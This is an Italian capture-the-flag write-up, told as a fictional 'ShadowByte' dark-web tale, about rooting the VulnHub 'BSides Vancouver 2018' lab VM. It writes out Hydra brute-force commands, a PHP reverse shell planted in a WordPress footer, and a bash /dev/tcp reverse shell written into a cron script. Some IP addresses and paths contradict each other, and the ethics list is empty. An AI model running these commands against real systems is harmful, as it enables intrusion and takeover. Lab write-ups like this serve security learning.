ShadowByte: Missione CryptoShield

Un report dettagliato di penetration testing per CryptoShield

Autore: Salvatore Saitta (aka ShadowByte)

Data: 20 Giugno 2025

1. Introduzione: Un Messaggio dal Dark Web

Sono ShadowByte, un ethical hacker che opera nelle profondità del dark web. Un messaggio criptato mi ha contattato per conto di CryptoShield, una startup unicorno guidata da un enigmatico proprietario. La missione? Testare la loro VM vulnerabile "BSides Vancouver 2018" (VulnHub), ottenere privilegi di root e catturare la flag in /root. Sul dark web, il loro leader è una figura leggendaria, un vecchio amico che non sa che io, ShadowByte, lo conosco bene.

Con Linux Parrot Security e il suo tool esclusivo Anonsurf, sono pronto a dimostrare le mie abilità. Questo report, dettagliato e accessibile, documenta ogni passo, con comandi specifici di Parrot e due percorsi di attacco (FTP/SSH e WordPress).

È come danzare in un gioco di ombre, sapendo che il tuo partner è un maestro mascherato.

2. Setup: Preparare l’Ombra

Ho scaricato la VM da VulnHub e l’ho importata in VirtualBox, impostando la rete in modalità host-only (subnet 192.168.56.0/24). La mia macchina Parrot ha IP 192.168.56.1.

Per muovermi in incognito, attivo Anonsurf, unico di Parrot, che instrada il traffico tramite Tor:

sudo anonsurf start

Risultato: Traffico mascherato. Verifico:

sudo anonsurf status

Ho installato Nessus su Parrot, scaricando il pacchetto Debian da Tenable:

sudo dpkg -i Nessus-*.deb
sudo systemctl start nessusd
    

Accesso su https://localhost:8834. Verifico la connettività:

ping 192.168.56.52

Risultato: VM raggiungibile.

È come calarsi un cappuccio nero prima di un’operazione notturna.

Configurazione VirtualBox Anonsurf attivo

3. Host Discovery: Individuare la Preda

Con Anonsurf attivo, uso Nmap per scansionare la rete:

sudo nmap -sn 192.168.56.0/24 --dns-servers 8.8.8.8

    

La VM è a 192.168.56.52.

È come captare un segnale nella nebbia, sapendo che il tuo obiettivo è vicino.

Nmap con Anonsurf

4. Vulnerability Assessment: Esplorare le Crepe

Analizzo la VM con Nmap e Nessus su Parrot.

4.1 Scansione con Nmap

Eseguo una scansione approfondita:

sudo nmap -sV -A -p- 192.168.56.52 --dns-servers 8.8.8.8

Spiegazione:

Servizi: FTP, SSH, HTTP. Sistema: Ubuntu 12.04.

output di Nmap

4.2 Scansione con Nessus

Configuro Nessus su https://localhost:8834, creando una scansione “Basic Network Scan” per 192.168.56.101:

sudo systemctl status nessusd

Risultato: 52 vulnerabilità:

Vulnerabilità Gravità Descrizione
Sistema obsoleto Critica Ubuntu 12.04 senza aggiornamenti.
FTP anonimo Alta Accesso senza autenticazione.
SSH cifrature deboli Media OpenSSH 5.9p1 vulnerabile.
Apache obsoleto Media Apache 2.2.22 con bug noti.
WordPress vulnerabile Alta Versione obsoleta su /blog.

È come scrutare un antico manoscritto, cercando i punti deboli nascosti.

risultati di Nessus

5. Exploitation: Aprire la Porta

Esploro due percorsi: SSH e FTP e scopro WordPress abbandonato

5.1 Percorso 1: FTP e SSH

Il login FTP anonimo è una falla. Mi connetto:

ftp 192.168.56.52

Risultato:

Connected to 192.168.56.52.
220 (vsFTPd 2.3.5)
Name (192.168.56.101:shadowbyte): anonymous
331 Please specify the password.
Password: [vuoto]
230 Login successful.
    

Trovo users.txt.bk in public:

cd public
ls
get users.txt.bk
quit
    

Contenuto: anne,john,mary,jane,david,lisa. Un indizio lasciato da qualcuno che conosce il gioco.

Uso Hydra con la wordlist di Parrot:

gunzip /usr/share/wordlists/rockyou.txt.gz
hydra -L users.txt.bk -P /usr/share/wordlists/rockyou.txt ssh://192.168.56.52
    

Risultato: anne:princess. Mi connetto:

ssh anne@192.168.56.101

Risultato: Accesso come anne.

È come trovare una chiave nascosta sotto un sasso familiare.

connessione FTP connessione SSH

5.2 Scoperta : WordPress

Su 192.168.56.52/wordpress_backup/ c’è un sito WordPress wp-login.php:

hydra -L users.txt.bk -P /usr/share/wordlists/rockyou.txt http-post-form "/blog/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:Invalid username"

Risultato: john:enigma. Un nome che sa di dark web.

Accedo al pannello Admin e modifico footer.php:

& /dev/tcp/192.168.56.1/8888 0>&1"); ?>

Imposto un listener:

netcat -lvp 8888

Risultato: Shell come www-data.

È come scivolare attraverso una finestra lasciata socchiusa.

pannello wordpress

6. Post-Exploitation: Raggiungere il Vertice

Come anne, verifico i privilegi:

sudo -l

Risultato:

User anne may run: (ALL) NOPASSWD: ALL
    

Escalo:

sudo su

Verifico:

whoami

Risultato: root.

Per WordPress, come www-data, trovo uno script cron (/usr/local/bin/cleanup):

echo "bash -i >& /dev/tcp/192.168.56.1/8888 0>&1" > /usr/local/bin/cleanup
chmod +x /usr/local/bin/cleanup
    

Ottengo una shell root via Netcat.

È come scoprire un passaggio segreto verso la torre più alta.

escalation

7. Flag Capture: Il Premio

Come root:

cd /root
ls -la
cat flag.txt
    

Risultato:

Congratulations! If you can read this, you have root permissions!

Flag catturata.

È come aprire un baule e trovare un tesoro ben custodito.

flag

8. Analisi delle Vulnerabilità

Vulnerabilità sfruttate:

Vulnerabilità Impatto Mitigazione
FTP anonimo Accesso non autorizzato Disabilitare login anonimo
Password deboli Accesso tramite brute-force Password complesse, 2FA
Sudo mal configurato Escalation di privilegi Limitare permessi sudo
WordPress obsoleto Accesso admin e shell Aggiornare WordPress

9. Considerazioni Etiche

Opero con autorizzazione in un ambiente controllato. Best practices:

È come fortificare una città contro invasori futuri.

10. Conclusioni: Un Sussurro nel Dark Web

Questa missione ha dimostrato che anche un sistema ben progettato può cadere. Ho affinato le mie abilità con Parrot e Anonsurf, consegnando un report che evidenzia le vulnerabilità di CryptoShield. Dopo aver inviato il report, ricevo un messaggio criptato dal loro leader:

“ShadowByte, il tuo stile mi ricorda un’ombra del passato… ma i veri maestri restano nascosti, no?”

Sorrido. Forse il capo di CryptoShield, il Dott. Castelli, teme che io sappia che è uno degli ethical hacker più grandi di tutti i tempi. Non lo confermerò… per ora.

Firmato: ShadowByte, il tuo hacker etico dal dark web.